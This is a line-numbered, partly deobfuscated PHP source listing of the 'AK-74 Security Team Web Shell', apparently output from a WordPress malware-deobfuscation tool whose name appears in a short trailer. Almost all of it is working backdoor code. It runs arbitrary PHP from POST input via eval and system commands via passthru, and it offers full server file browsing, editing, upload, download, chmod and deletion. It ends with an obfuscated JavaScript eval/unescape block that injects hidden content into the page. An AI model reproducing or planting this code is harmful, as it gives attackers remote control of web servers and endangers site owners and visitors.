016 | $GLOBALS["fzszjgc"] = "info"; |
017 | $GLOBALS["fvyvgcirdxx"] = "path"; |
018 | $GLOBALS["pgctubg"] = "perms"; |
019 | $GLOBALS["kmdyudoev"] = "sec"; |
020 | $GLOBALS["xcglkyuot"] = "dir"; |
021 | $GLOBALS["hoyoqwd"] = "mas"; |
022 | $GLOBALS["vtpgxuvxbi"] = "file"; |
023 | $osezbewemuin = "content"; |
024 | $GLOBALS["dwjodtpv"] = "handle"; |
025 | $GLOBALS["wdyvqrczdgu"] = "i"; |
027 | $dbmeztzpbjd = "content"; |
029 | $yuabcquera = "xshell"; |
032 | $wupyapffrye = "content"; |
033 | $xshell = $SERVER_["PHP_SELF"]; |
038 | $GLOBALS["qzgebdlknl"] = "mas"; |
042 | if ($handle = opendir($_SESSION["currentdir"])) { |
043 | $GLOBALS["qmdtpcoeduj"] = "handle"; |
044 | $GLOBALS["zoaynvkz"] = "file"; |
045 | while (false !== ($file = readdir($handle))) { |
047 | if (!is_dir($_SESSION["currentdir"] . "/" . $file)) { |
048 | $GLOBALS["sntlhgwvrnz"] = "file"; |
049 | $GLOBALS["mpyjuxikn"] = "i"; |
050 | $iwkugxydfbd = "file"; |
054 | $mas[$i]["filename"] = $file; |
055 | $GLOBALS["nhauqglig"] = "mas"; |
057 | $mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file); |
058 | $mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . $file)); |
069 | $ovnbdybfxfn = "mas"; |
070 | $GLOBALS["mscjpo"] = "mas"; |
072 | if ($handle = opendir($_SESSION["currentdir"])) { |
073 | $GLOBALS["hobugedqduo"] = "dir"; |
074 | $GLOBALS["xwlfufyf"] = "handle"; |
075 | while (false !== ($dir = readdir($handle))) { |
076 | $GLOBALS["iebmlxxk"] = "dir"; |
078 | $ulkfkgvahbq = "mas"; |
079 | if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) { |
085 | return ${$ovnbdybfxfn}; |
089 | if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) { |
092 | if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) { |
095 | return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/"); |
097 | function removefile() |
099 | if (file_exists($_GET["file"])) { |
100 | chmod($_GET["file"], 0777); |
101 | if (unlink($_GET["file"])) { |
102 | return "File deleted!"; |
104 | return "File deleted!"; |
107 | return "File not found!"; |
112 | chmod($_GET["dir"], 0777); |
113 | if (rmdir($_GET["dir"])) { |
114 | return "Directory deleted!"; |
116 | return "Directory not found!"; |
119 | function getmicrotime() |
121 | $GLOBALS["azoxuqxbstyx"] = "sec"; |
122 | $nyzhvmuivi = "usec"; |
123 | $GLOBALS["gpoxftmel"] = "usec"; |
124 | list($usec, $sec) = explode(" ", microtime()); |
125 | return (double) $usec + (double) $sec; |
127 | function getpermission($path) |
131 | $qusckboendqg = "info"; |
135 | $perms = fileperms($path); |
137 | $qelozowxyjq = "perms"; |
139 | $qgfxtbdfnruf = "perms"; |
140 | $siebgehypj = "info"; |
142 | $GLOBALS["uchwntfz"] = "info"; |
143 | $GLOBALS["jckaac"] = "perms"; |
144 | if (($perms & 0xc000) == 0xc000) { |
146 | } elseif (($perms & 0xa000) == 0xa000) { |
148 | } elseif (($perms & 0x8000) == 0x8000) { |
150 | } elseif (($perms & 0x6000) == 0x6000) { |
152 | } elseif (($perms & 0x4000) == 0x4000) { |
154 | } elseif (($perms & 0x2000) == 0x2000) { |
156 | } elseif (($perms & 0x1000) == 0x1000) { |
161 | $info .= $perms & 0x100 ? "r" : "-"; |
162 | $info .= $perms & 0x80 ? "w" : "-"; |
163 | $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); |
164 | ${$qusckboendqg} .= $perms & 0x20 ? "r" : "-"; |
166 | $info .= ${$tyfxbbfd} & 0x10 ? "w" : "-"; |
167 | $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); |
168 | $GLOBALS["xqayvij"] = "perms"; |
169 | $info .= $perms & 0x4 ? "r" : "-"; |
170 | ${$umyijesr} .= $perms & 0x2 ? "w" : "-"; |
171 | ${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); |
174 | function getpermissionarray($path) |
177 | $GLOBALS["ffvutedscs"] = "perms"; |
179 | $GLOBALS["mospvgr"] = "path"; |
180 | $perms = fileperms($path); |
181 | $GLOBALS["secvlqatfohv"] = "perms"; |
182 | $GLOBALS["bzngcqtouq"] = "perms"; |
183 | $GLOBALS["aboxvtoyg"] = "perms"; |
185 | $GLOBALS["woyxpuac"] = "res"; |
186 | $GLOBALS["mdbgzpglccyj"] = "perms"; |
187 | $ccbjnaxobblr = "res"; |
190 | $GLOBALS["vdddnl"] = "res"; |
192 | if (($perms & 0xc000) == 0xc000) { |
194 | } elseif (($perms & 0xa000) == 0xa000) { |
196 | } elseif (($perms & 0x8000) == 0x8000) { |
198 | } elseif (($perms & 0x6000) == 0x6000) { |
200 | } elseif (($perms & 0x4000) == 0x4000) { |
202 | } elseif (($perms & 0x2000) == 0x2000) { |
204 | } elseif (($perms & 0x1000) == 0x1000) { |
209 | $GLOBALS["nfmqqbwyhr"] = "perms"; |
210 | $res[] = $perms & 0x100 ? "r" : "-"; |
211 | $GLOBALS["rmhkov"] = "res"; |
212 | $res[] = $perms & 0x80 ? "w" : "-"; |
213 | $res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); |
214 | $res[] = $perms & 0x20 ? "r" : "-"; |
215 | $res[] = $perms & 0x10 ? "w" : "-"; |
216 | ${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); |
217 | $GLOBALS["gxyvyqrjw"] = "perms"; |
218 | ${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-"; |
220 | $res[] = $perms & 0x2 ? "w" : "-"; |
221 | ${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); |
222 | return ${$iaorpkyboh}; |
224 | function outputhead() |
228 | $res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>"; |
231 | function outputmenu() |
234 | $GLOBALS["omlmyuabmc"] = "res"; |
235 | $jrizoflsr = "xshell"; |
236 | $GLOBALS["kzvefdrkoqf"] = "res"; |
238 | $txbsfjnhvi = "xshell"; |
239 | $res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . "?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>"; |
242 | function outputdown() |
245 | $GLOBALS["srzeskty"] = "res"; |
246 | $res = "</table></div></body></html>"; |
249 | function outputfilemanager() |
251 | $GLOBALS["udmmztjca"] = "xshell"; |
252 | $GLOBALS["ychruqucrf"] = "xshell"; |
253 | $powlcxkoeay = "files"; |
254 | $shvztfinhxe = "dirs"; |
255 | $ckrwmyieozcl = "res"; |
256 | $GLOBALS["vmuyoysyoe"] = "res"; |
257 | $GLOBALS["orpfxw"] = "res"; |
258 | $GLOBALS["tuwswjh"] = "res"; |
259 | $GLOBALS["acmzbxffk"] = "res"; |
261 | $GLOBALS["vdtvfpbhyru"] = "number"; |
262 | $uxuysqwhok = "files"; |
264 | $GLOBALS["sejtvw"] = "dirs"; |
266 | $dirs = $this->getdirs(); |
267 | $files = $this->getfiles(); |
268 | $GLOBALS["asxszifet"] = "i"; |
271 | $res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>"; |
274 | $GLOBALS["wyqypgtjmi"] = "i"; |
275 | for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) { |
276 | $GLOBALS["vapieoe"] = "res"; |
278 | $GLOBALS["uvckfgaxtwdw"] = "res"; |
280 | $GLOBALS["wjjxsx"] = "xshell"; |
281 | $GLOBALS["bbrtstbve"] = "dirs"; |
282 | $GLOBALS["jeyjcbtlodsa"] = "dirs"; |
283 | $GLOBALS["ywnqtawj"] = "i"; |
284 | $GLOBALS["fxthzy"] = "dirs"; |
285 | $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>"; |
286 | $res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>"; |
287 | $res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>"; |
289 | for (${$kshyqqibce} = 0; $i < count($files); $i++) { |
290 | $GLOBALS["gkyyblyqymf"] = "i"; |
293 | $gruvymtvqist = "xshell"; |
294 | $GLOBALS["qwtxsjlqhhf"] = "files"; |
295 | $evvwgjhmulxe = "files"; |
296 | $GLOBALS["tefzqpvhph"] = "files"; |
297 | $GLOBALS["omvsytrtatv"] = "i"; |
298 | $GLOBALS["ypsmanoevl"] = "i"; |
300 | $ihduysxmqju = "res"; |
301 | $GLOBALS["tkghkgf"] = "res"; |
302 | $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>"; |
303 | $res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>"; |
304 | $res .= "<td> " . $files[$i]["filesize"] . "</td>"; |
305 | $khftnbmpvvs = "xshell"; |
306 | $res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>"; |
307 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>"; |
309 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>"; |
310 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">delete</a></td></tr>"; |
312 | ${$ckrwmyieozcl} .= "</table><br>"; |
313 | $res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">"; |
315 | $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
316 | $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
317 | $res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
318 | $res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">"; |
319 | ${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
322 | function outputinfo() |
324 | $vbgcqwfncvvz = "res"; |
327 | $res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
330 | function chmodform($file) |
332 | $istixexbyxa = "file"; |
335 | $GLOBALS["nwfedck"] = "perms"; |
337 | $perms = $this->getpermissionarray($file); |
338 | $GLOBALS["ynokejbtuh"] = "perms"; |
339 | $GLOBALS["ngqiunigukfh"] = "perms"; |
342 | $GLOBALS["ykexebt"] = "res"; |
343 | $GLOBALS["pefltgfgwzb"] = "i"; |
345 | $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; |
347 | $res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>"; |
348 | $GLOBALS["yggjmwlv"] = "res"; |
349 | $res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>"; |
350 | for ($i = 1; $i <= 9; $i++) { |
351 | $res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>"; |
353 | $res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>"; |
354 | $res .= "</table></td></tr></form>"; |
357 | function editfileform($file) |
360 | $GLOBALS["wcqoifupsbh"] = "file"; |
361 | $yyvjrmlhyubj = "fp"; |
362 | $fp = fopen($file, "r"); |
369 | $GLOBALS["ryysceaq"] = "res"; |
370 | $GLOBALS["yjdeuf"] = "res"; |
371 | $GLOBALS["kwyxxau"] = "file"; |
372 | $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; |
373 | $res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>"; |
374 | $res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . "> - <input type=\"submit\" value=\"Edit\"></td></tr>"; |
375 | $res .= "</table></td></tr></form>"; |
376 | fclose(${$yyvjrmlhyubj}); |
379 | function executeform() |
381 | $GLOBALS["gbbivqermof"] = "xshell"; |
382 | $GLOBALS["jcoxegkjqmx"] = "res"; |
384 | $res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">"; |
385 | $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
392 | eval(stripslashes($_POST["phpcode"])); |
396 | function exesysform() |
400 | $GLOBALS["lmwlmrqw"] = "res"; |
401 | $GLOBALS["ubwopher"] = "res"; |
402 | $res .= "<form action=\"" . $xshell . "?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">"; |
403 | $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
408 | $GLOBALS["yvcpokfc"] = "result"; |
411 | $result = passthru($_POST["cmmd"]); |
415 | function editfile($file) |
417 | if (!empty($_POST["rename"])) { |
418 | rename($_POST["file"], $_POST["rename"]); |
420 | $fp = fopen($_POST["rename"], "w"); |
424 | fwrite($fp, stripslashes($_POST["filecontent"])); |
428 | function chmodfile($file) |
431 | $ipjaivcsdnlk = "res"; |
432 | $sgwdghqlhfy = "res"; |
433 | $GLOBALS["pufgvr"] = "res"; |
434 | $fcpofletrcs = "res"; |
435 | $GLOBALS["ikiudyniptdh"] = "res"; |
436 | $GLOBALS["lzykxw"] = "res"; |
439 | $tulbauxmvcdt = "res"; |
443 | switch ($_POST["perms0"]) { |
448 | $res = ${$gorewqwudp} | 0xa000; |
451 | ${$hlfwyxuk} |= 0x8000; |
468 | $GLOBALS["xeomnnbyudw"] = "res"; |
469 | if (isset($_POST["perms1"])) { |
472 | if (isset($_POST["perms2"])) { |
473 | $res = ${$tpmdfbgb} | 0x80; |
475 | if (isset($_POST["perms3"])) { |
476 | $res = ${$txyrsfflh} | 0x40; |
478 | if (isset($_POST["perms4"])) { |
479 | ${$feixofkogs} = $res | 0x20; |
481 | if (isset($_POST["perms5"])) { |
484 | if (isset($_POST["perms6"])) { |
485 | $res = ${$tulbauxmvcdt} | 0x8; |
487 | if (isset($_POST["perms7"])) { |
488 | $res = ${$fcpofletrcs} | 0x4; |
490 | if (isset($_POST["perms8"])) { |
493 | if (isset($_POST["perms9"])) { |
496 | echo substr(sprintf("%o", $res), 4); |
497 | return chmod($file, intval(substr(sprintf("%o", $res), 4), 8)); |
499 | function downloadfile($file) |
502 | header("Content-Type: application/octet-stream"); |
503 | header("Content-Length: " . filesize($file)); |
504 | header("Content-Disposition: attachment; filename={$file}"); |
510 | if (!empty($_POST["dircreate"])) { |
511 | if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) { |
512 | return "Directory created!"; |
515 | return "Error creating directory"; |
517 | function createfile() |
519 | if (!empty($_POST["filecreate"])) { |
520 | $GLOBALS["lwhsyzdtepf"] = "fp"; |
521 | if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) { |
524 | $fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w"); |
531 | return "Error creating file"; |
533 | function uploadfile() |
535 | if ($_FILES["filename"]["error"] != 0) { |
538 | $_POST["filename2"] = trim($_POST["filename2"]); |
539 | if (empty($_POST["filename2"])) { |
540 | $_POST["filename2"] = $_FILES["filename"]["name"]; |
542 | if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { |
543 | if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { |
544 | return "File download failed..."; |
547 | return "The file was uploaded successfully!"; |
551 | $timestart = $shell->getmicrotime(); |
553 | if (!isset($_SESSION["currentdir"])) { |
554 | $_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]); |
556 | if (isset($_GET["dir"])) { |
557 | if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) { |
558 | $_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]); |
560 | Header("Location: {$xshell}?act=filemanager"); |
562 | $_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]); |
563 | $bxmeyfko = "content"; |
564 | if (substr($_SESSION["currentdir"], 1, 1) == "/") { |
565 | $_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1); |
567 | $GLOBALS["lvsmiwfpysj"] = "content"; |
568 | switch ($_POST["action"]) { |
570 | if ($shell->chmodfile($_POST["file"])) { |
571 | ${$GLOBALS["iknpldrpigo"]} .= "The change was successful"; |
575 | if ($shell->editfile($_POST["file"])) { |
576 | ${$wupyapffrye} .= "The edit was successful"; |
586 | ${$GLOBALS["iknpldrpigo"]} .= $shell->createdir(); |
589 | ${$dbmeztzpbjd} .= $shell->createfile(); |
592 | ${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile(); |
595 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead(); |
596 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu(); |
597 | switch ($_GET["act"]) { |
599 | ${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]); |
602 | ${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]); |
605 | ${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]); |
608 | if ($_GET["act2"] == "del") { |
609 | ${$bxmeyfko} .= $shell->removefile(); |
611 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager(); |
612 | if ($_GET["act3"] == "del") { |
613 | ${$hilzzmbb} .= $shell->removedir(); |
620 | ${$bcaxbgujhqyk} .= $shell->outputinfo(); |
623 | ${$GLOBALS["iknpldrpigo"]} .= $shell->executeform(); |
626 | ${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform(); |
629 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown(); |
630 | echo ${$osezbewemuin}; |
631 | echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>"; |
632 | echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n"; |
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.
Japanese 
English
PHP deobfuscation, decryption, reconstruction tool